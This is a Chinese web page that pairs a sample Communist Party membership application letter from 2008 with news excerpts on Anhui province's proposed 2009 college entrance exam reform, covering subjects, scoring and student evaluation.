从学生年代开始,一串闪光的名字--江姐、刘胡兰、雷锋、焦裕禄、孔繁森……给了我很大的启迪和教育。我发现她们以及身边许多深受我尊敬的人都有一个共同的名字--共产党员;我发现在最危急的关头总能听到一句话--共产党员跟我上。这确立了我要成为她们中的一员的决心。我把能参加这样伟大的党作为最大的光荣和自豪。
参加工作后,在组织和领导的关心和教育下,我对党有了进一步的认识。党是由工人阶级中的先进分子组成的,是工人阶级及广大劳动群众利益的忠实代表。党自成立以来,始终把代表各族人民的利益作为自己的重要责任。在党的路线、方针和政策上,集中反映和体现了全国各族人民群众的根本利益;在工作作风和工作方法上坚持走群众路线,并将群众路线作为党的根本工作路线;在党员的行动上,要求广大党员坚持人民利益高于一切,个人利益服从人民利益。 【入党申请书范文】
党以马列主义、毛泽东思想及邓小平理论为指导思想。《共产党宣言》发表一百多年来的历史证明,科学社会主义理论是正确的,社会主义具有强大的生命力。社会主义的本质,是解放生产力,发展生产力,消灭剥削,消除两极分化,最终达到共同富裕。毛泽东思想是以毛泽东同志为主要代表的中国共产党人,把马列主义的基本原理同中国革命的具体实践结合起来创立的。毛泽东思想是马列主义在中国的运用和发展,是被实践证明了的关于中国革命和建设的正确的理论原则和经验总结,是中国共产党集体智慧的结晶。邓小平理论是毛泽东思想在新的历史条件下的继承和发展,是当代中国的马克思主义,是指导中国人民在改革开放中胜利实现社会主义现代化的正确理论。在社会主义改革开放和现代化建设的新时期,在跨越世纪的新征途上,一定要高举邓小平理论的伟大旗帜,用邓小平理论来指导我们的整个事业和各项工作。【入党申请书范文】
党是中国社会主义事业的领导核心。中国的革命实践证明没有中国共产党的就没有新中国,没有中国共产党的领导,中国人民就不可能摆脱受奴役的命运,成为国家的主人。在新民主主义革命中,党领导全国各族人民,在毛泽东思想指引下,经过长期的反对帝国主义、封建主义、官僚资本主义的革命斗争,取得了胜利,建立了人民民主专政的中华人民共和国。中国的建设实践证明,中国只有在中国共产党的领导下,才能走向繁荣富强。建国后,我国顺利地进行了社会主义改造,完成了从新民主主义到社会主义的过渡,确立了社会主义制度,社会主义的经济、政治和文化得到了很大的发展。尽管在前进的道路上遇到过曲折,但党用她自身的力量纠正了失误,使我国进入了一个更加伟大的历史时期。十一届三中全会以来,在邓小平理论的指导下,在中国共产党的领导下,我国取得了举世瞩目的发展,生产力迅速发展,综合国力大大增强,人民生活水平大幅提高。
我国社会主义初级阶段党的基本路线是:领导和团结全国各族人民,以经济建设为中心,坚持社会主义道路、坚持人民民主专政、坚持中国共产党的领导、坚持马列主义毛泽东思想,坚持改革开放,自力更生,艰苦创业,为把我国建设成为富强、民主、文明的社会主义现代化国家而奋斗。
中国共产党员是中国工人阶级的有共产主义觉悟的先锋战士,必须全心全意为人民服务,不惜牺牲个人的一切,为实现共产主义奋斗终身。中国共产党党员永远是劳动人民的普通一员,不得谋求任何私利和特权。在新的历史条件下,共产党员要体现时代的要求,要胸怀共产主义远大理想,带头执行党和国家现阶段的各项政策,勇于开拓,积极进取,不怕困难,不怕挫折;要诚心诚意为人民谋利益,吃苦在前,享受在后,克已奉公,多作贡献;要刻苦学习马列主义理论,增强辨别是非的能力,掌握做好本职工作的知识和本领,努力创造一流成绩;要在危急时刻挺身而出,维护国家和人民的利益,坚决同危害人民、危害社会、危害国家的行为作斗争。 【入党申请书范文】
我决心用自己的实际行动接受党对我的考验,我郑重地向党提出申请:我志愿加入中国共产党,拥护党的纲领,遵守党的章程,履行党员义务,执行党的决定,严守党的纪律,保守党的秘密,对党忠诚,积极工作,为共产主义奋斗终身,随时准备为党和人民牺牲一切,永不叛党。
今后会我更加努力地工作,认真学习马克思列宁主义、毛泽东思想、邓小平理论,学习党的路线、方针、政策及决议,学习党的基本知识,学习科学、文化和业务知识,努力提高为人民服务的本领。时时刻刻以马克思列宁主义、毛泽东思想、邓小理论作为自己的行动指南,用三个"忠实代表"指导自己的思想和行动。坚决拥护中国共产党,在思想上同以江泽民同志为核心的党中央保持一致,认真贯彻执行党的基本路线和各项方针、政策,带头参加改革开放和社会主义现代化建设,为经济发展和社会进步艰苦奋斗,在生产、工作、学习和社会生活中起先锋模范作用。坚持党和人民的利益高于一切,个人利益服从党和人民的利益,吃苦在前,享受在后,克己奉公,多做贡献。自觉遵守党的纪律和国家法律,严格保守党和国家的秘密,执行党的决定,服从组织分配,积极完成党的任务。维护党的团结和统一,对党忠诚老实,言行一致,坚决反对一切派别组织和小集团活动,反对阳奉阴违的两面派行为和一切阴谋诡计。切实开展批评和自我批评,勇于揭露和纠正工作中的缺点、错误,坚决同消极腐败现象作斗争。密切联系群众,向群众宣传党的主张,遇事同群众商量,及时向党反映群众的意见和要求,维护群众的正当利益。发扬社会主义新风尚,提倡共产主义道德,为了保护国家和人民的利益,在一切困难和危险的时刻挺身而出,英勇斗争,不怕牺牲。反对分裂祖国,维护祖国统一,不做侮辱祖国的事,不出卖自己的国家,不搞封建迷信的活动,自觉与一切邪教活动作斗争。只要党和人民需要,我会奉献我的一切! 【入党申请书范文】
我深知按党的要求,自己的差距还很大,还有许多缺点和不足,如处理问题不够成熟、政治理论水平不高等。希望党组织从严要求,以使我更快进步。我将用党员的标准严格要求自己,自觉地接受党员和群众的帮助与监督,努力克服自己的缺点,弥补不足,争取早日在思想上,进而在组织上入党。
请党组织在实践中考验我!
此致
敬礼!
申请人:龙良杰
二〇〇八年四月一日
|
●模式改为“3+文综/理综+学业水平考试+综合素质评价”
●综合素质评价不合格或低于C级,二本以上院校不予录取
●考分相同,优先录取“学业水平”和“综合素质”高的考生
安徽09高考方案开始征求意见 拟摒弃"唯分录取"
据安徽商报报道, 2009年的高考考什么?新课改后的首次高考与现行高考的模式有多大变化?记者1月22日获悉,备受社会关注的《安徽省2009年普通高等学校统一招生考试工作指导方案》(征求意见稿),及与之配套的《安徽省普通高中学生学业水平考试方案》已经制订完毕,目前正全面征询各方意见。
关键词:考试模式3+文综/理综+学业水平考试+综合素质评价
安徽省2009年高考的考试模式为“3+文科综合/理科综合+学业水平考试+综合素质评价”。其中,统考科目总分仍为750分,最大亮点是首次把“学业水平考试”和“综合素质评价”作为高校招生录取的依据。“3”是指语文、数学和外语三个科目,是所有考生的必考科目,其中数学分为文科数学和理科数学;“文科综合”包括思想政治、历史、地理,是文科倾向的考生必考科目。“理科综合”包括物理、化学、生物,是理科倾向的考生必考科目;体育类、艺术类考生可选择文科综合也可选择理科综合,再加考术科。“学业水平考试”设语文、数学、外语、人文与社会基础、科学基础和技术素养六个科目。语文、数学、外语考试范围为必修模块的基本内容;人文与社会基础考试范围为思想政治、历史、地理必修模块的基本内容;科学基础考试范围为物理、化学、生物必修模块的基本内容;技术素养考试范围为信息技术、通用技术必修模块的基本内容,其中信息技术实行上机考试。 同时,学生“综合素质评价”将从公民道德素养、交流与合作、学习态度与能力、实践与创新、运动与健康、审美与表现六个基础性发展目标进行。评价由学生本人、同班同学、任课教师共同完成。学生自评权重为10%,学生互评权重为40%,教师评价权重为50%。每个基础性发展目标的评定结果以等级方式呈现,其中“公民道德素养”分为优秀、合格、不合格,其他五个基础性发展目标均分为A、B、C、D四个等级。每个基础性发展目标的总评等级按高一占30%、高二占30%、高三占40%的比例合成。评价结果以电子表格的形式进入考生档案。
关键词:考试成绩统考科目仍为750分“学业水平考试”分四等级
09高考新方案的统考科目分值仍为750分,而“学业水平考试”则安排在高二年级第二学期开始,开考全部科目。按照该草案,统考科目总分值为750分,其中各科分值和考试时间分别为:语文150分(150分钟)、数学150分(120分钟)、英语150分(120分钟)、文科综合/理科综合均为300分(150分钟)。 在“学业水平考试”中,语文、数学、外语试卷满分值100分,人文与社会基础、科学基础试卷满分值150分,技术素养试卷满分值60分。学生每科目考一次,成绩按所有考生成绩分布划分为A、B、C、D四个等级。其中排名为前25%的考生为A,前60%~25%的考生为B,前95%~60%的考生为C,剩下的为D级。成绩为D等级的学生可参加补考,补考时间安排在高三年级第一学期,补考成绩分为合格、不合格两个等级。
关键词:统考命题统考命题范围为“必修+选修I”
该方案征求意见稿中,统考科目仍是考生高考是否被录取、以及被哪所高校录取的最重要依据。据悉,统考科目命题内容为国家课程方案规定的该科目必修与选修I的内容。09年高考安徽省仍将试行自主命题。统考科目各科的命题范围仍是各学科课程标准和考试大纲及考试说明要求命题;学业水平考试依据各学科课程标准和考试纲要命题;试题将突出新情境、新材料,力求联系学生生活经验和社会实际,注重考查学生终身学习必备的基础知识与技能,以及综合运用知识分析解决问题的能力;同时,命题会考虑全省各地教学条件的不同以及城乡的差异。 统考科目考查的是国家课程方案规定的该科目必修与选修I的内容。其中选修I的分值约占6%,均为必做题,考查的选修系列或选修模块由当年的《安徽省普通高等学校统一招生考试(安徽卷)考试说明》确定;学业水平考试考查国家课程方案规定的必修内容。 |
| 安徽省2009年高考方案 |
| 2007-6-17 23:10:00 |
|
安徽省2009年高考方案
安徽省2009年普通高校招生考试工作指导方案(一)
一、科目设置 “3+文科综合/理科综合+学业水平监测考试+综合素合素质评价”。
二、统考科目 “ 文科综合包括政治、历史、地理和技术课程,文史方向的考生须参加文科综合考试; 理科综合包括物理、化学、生物和技术课程,理工方向的考生须参加理科综合考试。 体育类考试科目为理工类考试科目组合,再加考相关术科。 艺术类考试科目为文史类考试科目组合,再加考相关术科。 安徽省2009年普通高校招生考试工作指导方案(二)
一、科目设置 “3+2+学业水平监测考试与综合素质评价”。 二、统考科目
“3”指语文、数学和外语三个科目,是所有考生的必考科目。 “2”指由考生在历史、物理两个科目中选择一门,再在政治、地理、化学、生物、技术五个科目中任选一门。 体育类和艺术类考生再加考相关术科。 。 安徽省2009年普通高校招生考试工作指导方案(三)
科目设置 “3+学业水平测试” 艺术类、体育类考生加试科目为艺术或体育专业 |
改革高中课程也分必修、选修“我省2009年的高考新方案将让全社会都来讨论,以最大限度地适应百姓的承受力,符合我省实际。”昨天,省教育厅副厅长金燕表示,届时,新方案将充分体现民主的过程,听取公众的意见和建议。
新方案到底新在哪里呢?目前,我省高考科目设置是“3+X”,这个“3”指的是语文、数学、外语三门文化基础科目,英语设有听力考试,并计入总分。“X”是指文科综合(政治、历史、地理)或理科综合(物理、化学、生物)能力测试。
我省高中“新课改”全面实施后,与以前的科目设置大不同:高中和大学一样,把所学的科目分为必修和选修,包括语文、数学、英语、思想政治、历史、地理、物理、化学、生物、音乐、美术、体育与健康、信息技术、综合实践活动等课程。
因此,新高考方案将可能不再是像现在这样,按某一科教材来考,而是更加突出整体的综合性。伴随而至的,就是高校招生依据的改革,分数可望不再成为录取的唯一标准。
推敲“11选3再选1”全被推翻
高中“新课改”已经实施一年了,教师、学生和家长颇有些着急:高考“指挥棒”还未挥出,该如何应对?为此,有些学校随意增加考试科目的课时,随意减少非考试科目的教学时间。甚至有学校在上“新课改”教材的同时,偷偷地教授老教材。